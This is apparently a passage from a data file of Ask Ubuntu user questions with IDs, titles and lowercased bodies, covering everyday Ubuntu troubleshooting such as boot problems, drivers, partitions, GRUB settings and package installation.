open up the terminal and i see my leftover 120gb partition , with all my files still safe and intact . my real problem lies with the primary partition . if ubuntu supposedly uses up only 4.5gb of hard disk space , i should have 34.9gb free/leftover space in the primary partition . but , i ca n't find it ! where is it ? in windows , i know you can see how much space is used and your remaining free space in `` drive c '' . how can i find and access that remaining space in ubuntu ?
281816	are there other traditional chinese zhuyin input other than the default ?	in 12.04 , there is only one traditional chinese zhuyin input : chewing however , chewing has many features i do not like . the most annoying one is that chewing randomly drops characters after you type too many characters and fill the `` queue '' . for example , chewing outputs this when i type 1~10 ( 一二三四五六七八九十 ) repeatedly many times : 一四五七十一四五六七八九十一二三四五六七八九十 ^^^^^^^^^^^^^ expected : 一二三四五六七八九十一二三四五六七八九十一二三四五六七八九十 chewing drops the characters 二三六八九二三 ( 2 , 3 , 6 , 8 , 9 , 2 , 3 ) . this is very annoying and obstructive . are there any other traditional chinese zhuyin packages i could try out ? thank you .
281824	many games stuttery - nvidia	many games i play are stuttery , ( run at a fine fps , but pause randomly every second or so ) . this happens both when running a native game such as amnesia , and a game through wine like lol or wow . occasionally i can stop amnesia from doing it by restarting it and turning ssao on and off repeatedly , which is a bit weird . i am using the proprietary nvidia drivers ( nvidia-current , the beta ones are n't compatible with my card ) . here is the output from lshw -c video *-display description : vga compatible controller product : c61 [ geforce 6150se nforce 430 ] vendor : nvidia corporation physical id : d bus info : pci @ 0000:00:0d.0 version : a2 width : 64 bits clock : 66mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:22 memory : fa000000-faffffff memory : e0000000-efffffff memory : f9000000-f9ffffff memory : fbec0000-fbedffff how do i fix this issue , or is my gpu just not good enough ?
281825	i ca n't boot my compaq presario desktop from an ubuntu 12.04 usb	i have a compaq presario sr2017cl desktop running windows7 . the computer locked up and when i did a hardboot and now i get a `` disk read error occurred , press control alt delete to restart . '' upon pressing control alt delete , i 'm taken to the same screen . i have a parted magic disc that i 've used recently on a dell laptop that worked beautifully . i ca n't get the compaq to boot from the dvd even when i change the boot order in the bios , nor can i get it to start from the windows 7 recovery cd . i have ubuntu 12.04 lts on a usb drive that i used to install ubuntu on a hp laptop which i 'm using right now . when i try to boot the desktop from that same usb , it wo n't boot from it and i get the same disk read error over and over . i 've researched this extensively online and the only answers i come up with are to change the boot order , or use f10 to choose what to boot from . i 've tried that repeatedly to no avail . i 've also tried unplugging the power , holding the power button for a full minute and powering back up . so far , nothing has worked . i 'm at my wits end . i know both the parted magic dvd and usb work correctly but i ca n't get them to work on this bleeping computer . any help would be greatly appreciated .
281829	how to get teamviwer voip work	i 'm using ubuntu 13 . 10 and teamviewer8 , it 's work perfect with remote controlling stuff , but when i want to use its voip with meeting it said to me : please connect a microphone and please connect speakers i tried to setup voice from wine config but it seems to work fine and my mic is working great with skype
281834	steam does not create system starters for some games	for some games i installed , steam has n't created system starters . so i ca n't access them from the system software menu , and i ca n't search for them in the program search . how can i force steam to create these launchers ? as proposed i started steam from the terminal , the output is shown below . i tried to create a shortcut for a game that already had won , and then the following message came : `` a shortcut has been created and placed on your desktop '' . wen i then wanted to create a shortcut for a game that had none , the message was : `` could not create shortcut . a shortcut to this game is probably already on the desktop . here 's the output of the terminal : running steam on ubuntu 12.10 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) unlinked 0 orphaned pipes gtk-message : failed to load module `` overlay-scrollbar '' ( steam:3247 ) : gtk-warning ** : im modulpfad âťadwaitaâť konnte keine themen-engine gefunden werden , /usr/share/themes/adwaita/gtk-2.0/gtkrc:989 : error : unexpected identifier `direction ' , expected character ` } ' installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) [ 0416/155018 : warning : proxy_service.cc ( 646 ) ] pac support disabled because there is no system implementation installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) process 3247 created /ampa-valveipcsharedobjects3 installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) generating new string page texture 2 : 48x256 , total string texture memory is 49,15 kb generating new string page texture 3 : 384x256 , total string texture memory is 442,37 kb installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) adding license for package 0 adding license for package 64 adding license for package 110 adding license for package 242 adding license for package 2275 adding license for package 2529 roaming config store loaded successfully - 448 bytes . migrating temporary roaming config store execcommandline : `` /home/ampa/.local/share/steam/ubuntu12_32/steam '' `menu_proxy_module_load ' : /home/ampa/.local/share/steam/ubuntu12_32/steam : undefined symbol : menu_proxy_module_load ( steam:3247 ) : gtk-warning ** : failed to load type module : ( null ) generating new string page texture 71 : 1024x256 , total string texture memory is 1,49 mb generating new string page texture 72 : 128x256 , total string texture memory is 131,07 kb generating new string page texture 73 : 128x256 , total string texture memory is 1,62 mb generating new string page texture 74 : 256x256 , total string texture memory is 1,88 mb generating new string page texture 75 : 32x256 , total string texture memory is 1,92 mb generating new string page texture 76 : 64x256 , total string texture memory is 1,98 mb ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:3247 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) system startup time : 38,23 seconds generating new string page texture 79 : 24x256 , total string texture memory is 2,01 mb generating new string page texture 80 : 128x256 , total string texture memory is 2,14 mb generating new string page texture 81 : 8x256 , total string texture memory is 2,15 mb running steam on ubuntu 12.10 64-bit steam_runtime has been set by the user to : /home/ampa/.local/share/steam/ubuntu12_32/steam-runtime capijobrequestuserstats - server response failed 2 execcommandline : `` /home/ampa/.steam/root/ubuntu12_32/steam steam : //open/driverhelperready '' execsteamurl : `` steam : //open/driverhelperready '' generating new string page texture 88 : 512x256 , total string texture memory is 2,67 mb generating new string page texture 91 : 128x256 , total string texture memory is 2,80 mb generating new string page texture 93 : 256x256 , total string texture memory is 3,06 mb generating new string page texture 96 : 16x256 , total string texture memory is 3,08 mb generating new string page texture 97 : 256x256 , total string texture memory is 3,34 mb generating new string page texture 112 : 48x256 , total string texture memory is 3,39 mb generating new string page texture 95 : 128x256 , total string texture memory is 3,52 mb unlinked 2 orphaned pipes casynciomanager : 0 threads terminating . 0 reads , 0 writes , 0 deferrals . casynciomanager : 368113 single object sleeps , 0 multi object sleeps casynciomanager : 0 single object alertable sleeps , 7 multi object alertable sleeps [ 2013-04-16 15:50:14 ] startup - updater built mar 29 2013 11:40:39 [ 2013-04-16 15:50:14 ] verifying installation ... [ 2013-04-16 15:50:15 ] verification complete shutting down . . . [ 2013-04-16 15:56:48 ] shutdown ps : i think that me , you and steam have a different understanding of `` shortcut '' . what i mean by this is not a shortcut on the desktop , but an application shortcut in the system , which enables me to search games or to start them from the menu . i have this problem with 2 games , darwinia and uplink . i installed 8 games with steam .
281837	does ubuntu 13 raring ringtail fix the samsung brick issue ?	does ubuntu 13 raring ringtail fix the samsung brick issue ? i really want to install ubuntu on my np700z7c , however 12.10 reduces it to a shiny brick ... since it takes samsung over 2 weeks to fix the thing , i thought i would ask before trying something which i can not find any indormation about .
281844	which services are enabled by default in 13.04 ?	after upgrade to ubuntu desktop 13.04 i have these services enabled ( i reviewed with rcconf ) : │ [ * ] acpi-support │ [ * ] brltty braille terminal driver │ [ * ] grub-common record successful boot for grub │ [ * ] kerneloops tool to automatically collect and submit kernel crash signatures │ [ * ] ondemand set the cpu frequency scaling governor to `` ondemand '' │ [ * ] pppd-dns restore resolv.conf if the system crashed . │ [ * ] rsync fast remote file copy program daemon │ [ * ] sudo provide limited super user privileges to specific users │ [ * ] x11-common | [ ] acpid │ [ ] alsa-restore │ [ ] alsa-store │ [ ] anacron │ [ ] apparmor apparmor initialization │ [ ] apport │ [ ] avahi-cups-reload │ [ ] avahi-daemon │ [ ] bluetooth │ [ ] console-font │ [ ] console-setup │ [ ] cron │ [ ] cups │ [ ] cups-browsed │ [ ] dbus │ [ ] dmesg │ [ ] failsafe-x │ [ ] friendly-recovery | [ ] hostname │ [ ] hwclock │ [ ] hwclock-save │ [ ] irqbalance │ [ ] kmod │ [ ] lightdm │ [ ] modemmanager │ [ ] network-interface │ [ ] network-interface-container │ [ ] network-interface-security │ [ ] network-manager │ [ ] plymouth │ [ ] plymouth-log │ [ ] plymouth-splash │ [ ] plymouth-stop │ [ ] plymouth-upstart-bridge │ [ ] procps │ [ ] pulseaudio │ [ ] resolvconf │ [ ] rfkill-restore │ [ ] rfkill-store │ [ ] rsyslog │ [ ] saned sane network scanner server │ [ ] setvtrgb [ ] speech-dispatcher speech dispatcher │ [ ] udev │ [ ] udev-fallback-graphics │ [ ] udev-finish │ [ ] udevmonitor │ [ ] udevtrigger │ [ ] ufw │ [ ] whoopsie my question is , which services are enabled by default in ubuntu 13.04 ? maybe some body can take a look in a fresh 13.04 installation with rcconf utility ( rcconf is not installed by default ) thanks in advance .
281847	is it possible to prevent the root user from deleting the kernel ?	is it possible to prevent the root user from deleting the kernel ?
281848	flash player stopped working for protected content	i had flash player installed on two different computers running 12.10 along with the hal module and everything was working just fine . until a couple days ago . now whenever i try to watch any sort of drm protected videos , from any site , on any browser , on either computer , i get a message saying something to the effect that i need to update my flash player ( the exact wording depends on the site i 'm trying to view , of course ) . i have checked to see if my flash player is fully up to date and it is . i have also made sure run apt-get update and apt-get dist-upgrade on both machines and everything is up to date . despite the fact that it looks good , i tried uninstalling flash player and reinstalling it to no avail . i also tried reinstalling the hal module and got the same result . any thoughts on what could be causing this and how to fix it ? thanks in advance .
281850	comboboxtext in glade / gtk+3 / python - disappears when displayed 2nd time	i 'm trying to implement a drop down list in an ubuntu app using glade ( gtk+3 ) and python . i can get the comboboxtext to display , populated with strings . however when i close the window it is contained in and then re-open it , the combobox is not there , just a completely blank window . i added the comboboxtext widget in question to a window in glade . i then added this code in my python programme : def on_button_edit_clicked ( self , widget ) : `` '' '' display list of events already stored , and allow deletion `` '' '' self.combo = self.builder.get_object ( 'combo_box ' ) self.store = gtk.liststore ( str ) self.store.append ( [ 'hello ' ] ) self.store.append ( [ 'goodbye ' ] ) self.combo.set_model ( self.store ) event_editor = self.builder.get_object ( `` event_editor '' ) event_editor.show ( ) i even tried destroying the widget to see if that helps : def on_event_editor_destroy ( self , widget ) : self.combo.destroy ( ) self.store = gtk.liststore ( str ) self.combo.set_model ( self.store ) edit : i have since tried some alternative code , that included a cellrenderertext object , but still no luck . these are my sources ( unfortunately i ca n't link to them all as i do n't have enough of a reputation ) : i created a gtk.liststore ( ) , then i created a gtk.cellrenderertext ( ) , then i created a gtk.combobox ( ) . this was all in-line with example 13.3 here . nothing works . when i open the combobox window a 2nd time , it is just a blank window . can anyone help please ?
281852	ubuntu 12.04 ( 64-bit ) installation hangs before entering bootloader on asus n75sf , using live-cd	i 've been trying to install ubuntu 12.04 ( 64-bit ) on my asus n75sf laptop , but ubuntu ca n't get to the point of installing . it hangs immediately after entering the first purple screen ( the one where there is only the universal access picture which equals to a keyboard ) . it does n't report any errors at all , even after being hanged for around an hour , then i downloaded ubuntu again from a different source and put in on another cd , with no success . i also tried using the 32-bit version of 12.04 but it also hangs at the same point , while both versions of 10.04 work normally in live-cd mode ( have n't tried installing them ) . i updated my bios to the latest version available ( bios 214 from asus support page ) . i tried to see if windows 7 ( 64-bit ) installs , which it does , but i did n't go through with it . currently , there is no os installed on that machine , with the whole hdd formatted into two partitions via hierns tools . one partition is ext4 and the other is ntfs if it means anything . after following the instructions on other similar topics , i got stuck at the point that they say i should turn off acpi_osi= and nomodeset but i ca n't enter grub and bios does n't have such options . asus n75s specs : intel hm65 express chipset intel core i7- 2670qm cpu 8 gb ram nvidia geforcegt 555m 2gb 2.5 '' sata 750gb 7200rpm ps : i have a around 6 months of experience with linux and have some knowledge on the linux cli . additionally , i 've installed ubuntu 12.04 6 times before on 6 different machines , without any problems . edit : i checked the bios settings . uefi is disabled , but i ca n't seem to find the option for secure boot/csm and fastboot .
281853	how to list all configuration files for an already installed package ?	i am running ubuntu 12.10 and , if possible , i would like to get the list of configuration files available for a given package that is already installed . i would prefer to do this using dpkg or apt if possible , but no problem if other tools such as aptitude or dselect are needed/recommended .
281855	unity/gnome/gtk3 & other desktop issues	well , it 's been about a week , and i 'm quite frustrated . i just recently installed ubuntu 12.10 on my desktop , and i 've run into more than a few problems along the way . first , it began with having issues with installing the grub bootloaders on a dual boot system , which was fixed . then , after getting it fully installed , and booting up to find out the nvidia drivers were botched ( this , however after many attempts got fixed , was due to kernel images being mix matched with the current state of nvidia-current or something. ) . after all that , i had felt that unity was still a bit sluggish , so i tweaked some of the settings using ccsm , and i ticked something i should n't have ticked ( of course.. : / ) thus making me unable to boot up fully and see the taskbar and panels , but only the icons . i figured , at this point , i 'd might as well try gnome , after hearing about it allot . i installed gnome remix because i liked it better then gnome , and it worked for two days . after , changing my mind again , ( not liking the panels in gnome or gnome classic ) , i wanted to fix unity . after researching for a few minutes , i got unity back up and running , after reboots even . now , being 1h ago , after enabling the 'unity plugin '' in ccsm , and rebooting , no matter what i use , gnome , gnome classic , unity , all i get is my background , no icons , no taskbar , and no panels or popups whatsoever . i might also add , since the first install , i 've gotten a crap-ton of `` system failed '' or `` ubuntu 12.10 '' issues , which i 've reported all i could . which leads me here , kinda desktop screwed , because i do n't want to go back to windows , losing all my transferred items , re-installing due to the same reason , or even the fact that i have very slow internet , so anything over 100mb will take me more than a few hours to download . so , is there any way to un-screw myself from this predicament ? oh and , i installed ubuntu 12.10 using the same iso on my laptop , which is running flawlessly . ( fml )
281858	boot to command line 12.04 ( grub options not working )	i installed 12.04 desktop because i want the option to run unity in the future , but i prefer to work headless via ssh . i changed the following in /etc/default/grub : grub_cmdline_linux_default= '' quiet splash '' changed to : grub_cmdline_linux_default= '' text '' rebooted and still get the graphical unity interface changed the above to : grub_cmdline_linux_default= '' '' rebooted and again , no love -- still get the unity interface . i see that /boot/grub/grub.cfg is generated automagically by grub-mkconfig using templates /etc/grub.d and /etc/default . i saw that my first option in grub still read thusly : menuentry 'ubuntu , with linux 3.5.0-27-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root c40e42d6-6e01-4abf-b2e3-e46132dcfa0a linux /vmlinuz-3.5.0-27-generic root=uuid=3a07789f-f0b4-4123-a26a-6f245ef9054e ro quiet splash $ vt_handoffeneric echo 'loading linux 3.5.0-27-generic ... ' linux /vmlinuz-3.5.0-27-generic root=uuid=3a07789f-f0b4-4123-a26a-6f245ef9054e ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /initrd.img-3.5.0-27-generic } note that it still reads 'quiet splash ' above ( single quotes mine ) . so i ran grub-mkconfig to see if that was needed to re-build grub.cfg from /etc/default/grub , but even after running that , 'quiet splash ' persists . can anyone advise on where i 'm going wrong ? i just want my bash ... thanks .
281862	how can i get amazon instant video to work ?	i have flash , which seems to have dead ended at 11.2 . i have the latest chrome 23.xxx.x..x , but neither of those allow me to watch amazon instant video . i can disable pepper , but then the 11.2 on my system is out of date . is there any way i can get amazon instant video to work ?
281863	ensuring .profile gets executed when using nx	the $ path i have when i run terminal in an nx session is different to that i have when i run terminal after logging on physically . the former is /home/agrimm/.rbenv/shims : /home/agrimm/.rbenv/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games while the latter is /home/agrimm/.rbenv/bin : /home/agrimm/.rbenv/shims : /home/agrimm/.rbenv/bin : /home/agrimm/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games the latter has /home/agrimm/bin/ while the former does n't ( and yes , i 've rebooted since creating /home/agrimm/bin ) i suspect the difference is that .profile is getting run in the latter , but not in the former . http : //askubuntu.com/a/279374/14772 has in the last paragraph : non-login shells have login shells ( or something that behaves like a login shell ) as their parent , and inherit most of their environment variables , including path , from this login shell . so putting path-modifying commands in ~/.profile requires that you log out and back in for them to be effective , but it affects the environment of non-login shells too ( as well as the environment for programs that are not shells , since every program gets its own set of environment variables -- called its `` environment '' -- inherited from its parent process ) . i assume that logging in with nx is `` something that behaves like a login shell '' , and that when i run terminal , the parent process of terminal ought to provide it with a complete $ path , including home/agrimm/bin . is my assumption correct ? if so , how do i get nx to run .profile ?
281867	what media wo n't play ?	leaving aside drm media , are there specific codecs or filetypes which simply wo n't play on linux ? i 've installed ubuntu-restricted-extras but did n't get libavcodec-extra-53 for example . while there 's no specific filetype i 'm looking for , more of a list of what wo n't work .
281870	how to run a script immediately after the start splash screen appears ?	i 'm using kubuntu 12.04 lts . i 'd like to know where i can put the script of mine described below to run immediately after the splash screen of the initialization begins . # ! /bin/sh contrast=`echo `` scale=2 ; 6/10.0 '' | bc` brightness=`echo `` scale=2 ; 40/1.0 '' |bc` xgamma -quiet -gamma $ contrast xbacklight -set $ brightness ps . : this script ( for while ) changes the brightness and the contrast of my screen . i would like to improve it to perform other things but first i need to know how can i solve the problem described above .
281872	wifi does not work after system update	i recently installed ubuntu 12.10 x64 onto a dell inspiron 1525 . first thing i always do when installing new oss is being it up to speed to naturally i installed all updates before proceeding further . now the unit has rebooted and i have no wifi . i plug in an ethernet cable and do n't get anything that way either . the inspiron is using a broadcom wifi adapter , which i have found is known to cause issues . it also appears i am missing certain features in my build ... unless i 'm just doing something wrong . if someone could help me get my wireless adapter working i would be good to go and very greatful
281874	should i install non-repository software as root or as my user ?	what is the right way of installing programs that are not available in repositories : should my user own the binaries and keep them in ~/bin/ , or should root own the binaries and keep them in , say , /opt/ ? i 'm talking about a desktop system , not a server , and normal programs that do n't require any special privileges such as starting on boot etc . my concern is for safety . if the binary is owned by root , has mode 755 , and it runs as my user , then a virus should not be able to overwrite the binary , as opposed to the case where my user would own the binary , right ? i noticed that everything in /usr/bin/ is owned by root and has 755 permissions .
281876	how can i make compiz work with mate 1.6 ?	i 'm using mate 1.6 from the official mate apt repo . i 've tried enabling compiz using the following steps , based on this guide and adapted for mate 1.6 : open dconf editor go to org.mate.desktop.session.required-components change windowmanager from marco to compiz relogin however , when i relogin , i have no window frames and no compiz plugins . i 've tried compiz -- replace in a terminal , which gives no errors , only logs of it loading plugins .
281879	grub2 menu only shown after ctrl+alt+del	after finally getting grub to see my win8 installment , i decided to tackle my other grub2 issue . the grub menu only comes up if i press cad during a blank magenta splash screen that appears during boot where the grub menu should be . after i press cad my computer reboots and then i can see the grub menu . how can i set it so that the grub menu always shows up ? i already tried commenting out grub_hidden_timeout=0 and also changing the value . i also tried changing the value of grub_hidden_timeout_quiet=true
281881	how can i mount a windows 7 partition from ubuntu ( with no knowledge of what i 'm doing ) ?	i have no idea what i 'm doing here , at all . i bought a lenovo laptop from a pawn store , and it had windows 7 with a single locked user account . i 'd like to access the current files without resetting the entire system , so i installed ubuntu to a flash drive and have successfully booted from it ( i 'm using it now ) . however , i tried to access the windows 7 files , and i apparently can not mount the partition . i 've done a lot of searching on this topic around the forums and faqs and such , but most of what all is said makes no sense to me . can anyone explain , in layman 's terms , how i can `` mount '' the windows 7 `` partition '' ( which i think is what i need to do ) ?
281886	what is the difference between the different vim packages available in ubuntu	the difference between vim-gtk and vim-gnome has been discussed here . ubuntu usually offers more than these two options for vim : vim-nox vim-athena vim-* it is not clear which vim package have which dependecies and which one one should prefer on one 's system . i keep my vim configuration files ( ~/.vim folder ) on github and clone it on any system i have to work on . they work on vim-gnome but they will work on any of these distribution ? can we have major differences listed out between all possible vim candidate available on ubuntu so one can make a informed choice ?
281888	will ubuntu 12.10 ever update the kernel from 3.5 to 3.8 ?	i know ubuntu 13.04 includes linux kernel 3.8 . will ubuntu 12.10 ever update to 3.8 ?
281890	ubuntu 12.10 ca n't install any apps due stranger error	i ca n't install any app in the ubuntu , i ca n't even open the software center ( it crashes ) when i run sudo apt-get update , it shows me w : falhou ao buscar gzip : /var/lib/apt/lists/partial/br.archive.ubuntu.com_ubuntu_dists_quantal_universe_binary-i386_packages hash sum incorreto something like ( in english ) w : failed to download gzip : /var/lib/apt/lists/partial/br.archive.ubuntu.com_ubuntu_dists_quantal_universe_binary-i386_packages wrong hash sum can someone help me ?
281891	does ubuntu satisfy os requirements for android dev by default ?	i 'm an aspiring programmer trying to set up an environment for android development . i know from experience that software requirements need to be fulfilled before i can reasonably expect everything to go without a hitch . i ca n't seem to figure out the `` glibc 2.7 or later '' part of it . i have ubuntu 12.04 32-bit . in synaptic the closest things i can find are `` glibc-doc 2.15 '' and `` eglibc-source 2.15 . '' is it possible to get glibc 2.7 with synaptic package manager/ubuntu software center or do i need to roll my sleeves up ? or are these version numbers ( 2.15 and 2.7 ) not referring to the same thing ?
281893	overwrite existing ubuntu install with server installer	i 'm trying to over-write my existing ubuntu 12.10 32-bit installation . i take it i ca n't simply destroy the os from within the os , and the installer , when asked what disk i want to partition , will not display the existing system . i 'm upgrading the system to a 64 bit install , but i have no intention of keeping any files . also : the installer is n't letting me hit f6 for other options on boot of the drive . is it in there ?
281903	installing fglrx 13.3 with powerxpress on ubuntu 13.04	when trying to install fgrlx 13.3 from the amd website , the installation goes smoothly , but when i to aticonfig -- initial -f , i get the following error : uninitialised file found , configuring . powerxpress info : diagnostic output from /usr/lib64/fglrx/switchlibglx : update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group x86_64-linux-gnu_gl_conf is broken update-alternatives : warning : not replacing /usr/lib/x86_64-linux-gnu/xorg/extra-modules with a link then when i boot , x wo n't start . does anybody have an idea of how to fix this ? is there a special installation procedure or version i should be using for 13.04 beta ? i 'm on xorg-edgers right now , but i could easily revert them . my video card lines in lspci are as follows : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati whistler [ radeon hd 6600m/6700m/7600m series ]
281906	apt-get upgrade freezes at `` waiting for headers ''	i tried to upgrade my system using sudo apt-get upgrade but it 's not upgrading . it just shows : do you want to continue [ y/n ] ? y 0 % [ waiting for headers ] . then it does n't move forward .
281916	is there any parental block feature on ubuntu 12.04	is there any program that is similar to window 's parental control , which allows site blockage and download blockage ?
281917	ca n't automount two partitions at login	i 'm using ubuntu 12.04 . i wanted two of my ntfs partitions automounted on startup , so i followed the instructions on ubuntu documentation ( https : //help.ubuntu.com/community/automaticallymountpartitions ) . i chose the `` per-user mounting '' since i 'm the only user anyway and i did n't want to mess with fstab 'cause i do n't know how to set the correct options and my fstab does n't already have entries for the ntfs partitions . so i added to `` startup applications '' the command /usr/bin/udisks -- mount /dev/disk/by-uuid/5e1089a41089842d it initially worked for the first partition i set on startup applications , but when i added the command for the second partition ( which is identical except for the different uuid ) , the first command disappeared . in other words , it does work , but only for one partition . whenever i add a new entry on startup applications , the previous one disappears , as if ubuntu does n't allow two entries for the same program ( udisks in this case ) . is it a problem with startup applications , or is there something i do n't know ? is it possible to mount two partitions on the same command ( without mounting all partitions , since i have other partitions i do n't want automounted ) ? i did n't find it possible on man mount .
281919	ubuntu 12.04 not loading in virtual box on mac os x 10.8.3	i have a new macbook pro 15 '' retina display laptop running os x 10.8.3 . i am running virtualbox 4.2.12 . i downloaded ubuntu 12.04 lts earlier today and installed it as a virtual machine from the iso . i then installed many packages to run theli ( details below ) . i did the normal sudo apt-get update sudo apt-get upgrade and then installed all the bits i needed , plus the software i need the virtual box for . everything was working fine . however , when i powered off the vm and then tried rebooting it a while later it does not boot . i see the virtualbox window appear ( where i can hit f12 ) then the screen goes black/brown and nothing happens . the vm rebooted several times during the upgrades and package installs with no problems . i 've spent a couple of hours getting it to the way i need it and now it 's not booting . any ideas ? theli is used for reducing astronomy data . i installed all of the dependencies once the vm was up and running , then installed theli itself . it compiled with no errors and ran fine afterwards . please let me know if i can provide more information to help further . edit : i had not installed the guest additions , it was not suggested in the theli installation guide , and i am new to ubuntu so i did not know about them . do you think this could cause the problem ? i can reinstall everything from scratch to try . edit : i just started from scratch with a new install of ubuntu 12.04 lts . i started up the vm and ran : sudo apt-get update sudo apt-get upgrade and then i shut the vm down , waited a few sec and powered it up again . it started fine . i then went and installed all the prerequisites for theli ( see below ) , i shutdown the vm as before and after installing the things below the vm no longer starts up . can anyone spot something in there which could cause this ? sudo apt-get update sudo apt-get upgrade sudo apt-get install gfortran csh g++ libqt3-mt-dev gawk gettext wget sudo apt-get install tcl8.5-dev tk8.5-dev netpbm imagemagick libfftw3-dev sudo apt-get install xorg-dev pgplot5 libtiff4 libtiff4-dev libpng3 sudo apt-get install binutils-dev build-essential libtie-ixhash-perl sudo apt-get install libncurses5-dev perl xterm gzip pdl emacs nedit cmake sudo apt-get install python python-dev python-numpy libxxf86vm-dev sudo apt-get install python-scipy python-matplotlib libgsl0ldbl libgsl0-dev update : i went through installing the prerequisites above one by one on a fresh install of ubuntu 12.04 lts 64 bit . i found that after installing the xorg-dev package the vm would no longer boot . i have installed all the others and their prerequisites via apt-get and things seem to be fine . i am not sure what in xorg-dev ( or its prerequisites ) is causing the problem .
281920	shrink extended partition containing lvm	i have been bashing my head against the wall , regretting ever having opted into using lvm . i need to shrink the 75gb /dev/sda2/ to make room for a new os installation . to do this , i need to shrink the /dev/sd5 partition which is contained in sd2 . i first attempted to use gparted , but my version says it does not support lvm . i downloaded the latest .iso for gparted live into a cd , but the results were similar . so i have already taken all the steps to shrink the filesystem , volume group , physical volume , and so on . user @ computer : ~ $ sudo pvs pv vg fmt attr psize pfree /dev/sda5 ubuntu lvm2 a- 56.00g 1020.00m user @ computer : ~ $ sudo lvdisplay -- - logical volume -- - lv name /dev/ubuntu/root vg name ubuntu lv uuid blahblahblah lv write access read/write lv status available # open 0 lv size 55.00 gib current le 14080 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:0 i have even removed the swap_1 volume . when i run the latest gparted from the livecd , it does show the used 56gb volume group , then some 18gb unallocated space . however , it still does not let me resize /dev/sda5 or /dev/sda2 . how can i resize /dev/sda2 , given that the volume group and physical volumes are already 55gb , while is 18gb less than the size of the containing extended partition /dev/sd2 ?
281928	wubi offline installation error ; failed	i 'd read a guide to install ubuntu using wubi offlinely , but it 's failed . wubi installer is exact at root folder of ubuntu 12.04.2 lts desktop iso file . this is some string on log file : 04-15 12:34 debug distro : checking ubuntu iso e : \download\virtual drives\ubuntu-precise-lts-wubi-amd64\ubuntu-12.04.2-desktop-amd64.iso 04-15 12:34 debug distro : does not contain casper\vmlinuz yes i exactly place iso file at that directory , but still failed ( till now ) . what should i do ?
281930	need to install canon ip2600 printer using 12.04	using 12.04 32bit ; trying to setup canon ip2600 printer . when i try to install the canon driver apt-get refuses to install it , instead replaces `` libcupsys2 '' with newer `` libcups2 '' creating a dependency problem since the canon requires `` libcupsys2 '' . i have tried the standards : sudo apt-get update , sudo apt-get clean , sudo apt-get autoremove , sudo apt-get update & & sudo apt-get upgrade , sudo dpkg -- configure -a , & sudo apt-get install -f but none make the printer work i followed instructions at : http : //ubuntuforums.org/showthread.php ? t=1427098 to change the dependencys but that did not help , it generated error messages . printer state is still : `` idle - /usr/lib/cups/filter/gstoraster failed '' at this point i am wondering if i should `` apt-get remove '' the cups package . any help would be appreciated
281931	some plain text mails have a different font	( ubuntu 10.04 · thunderbird 17.0.5 ) i read all my mails as plain text ( view → message body as → plain text ) . usually they all are in the same font with the same font size : but once in a while i get a mail which is displayed in a different font/font size : at edit → preferences → display → formatting → advanced… i have the same settings for all languages/charsets . i also deactivated `` allow messages to use other fonts '' . what is the reason for the font difference ? the encoding of this particular mail seems to be chinese simplified ( gb2312 ) , at least according to view → character encoding . so i changed every font setting for simplified chinese ( to test it ) , but nothing changed in the mail . at this thread the solution ( for tb 13 ) was to change the font settings for other languages . but i do n't have this option in the list .
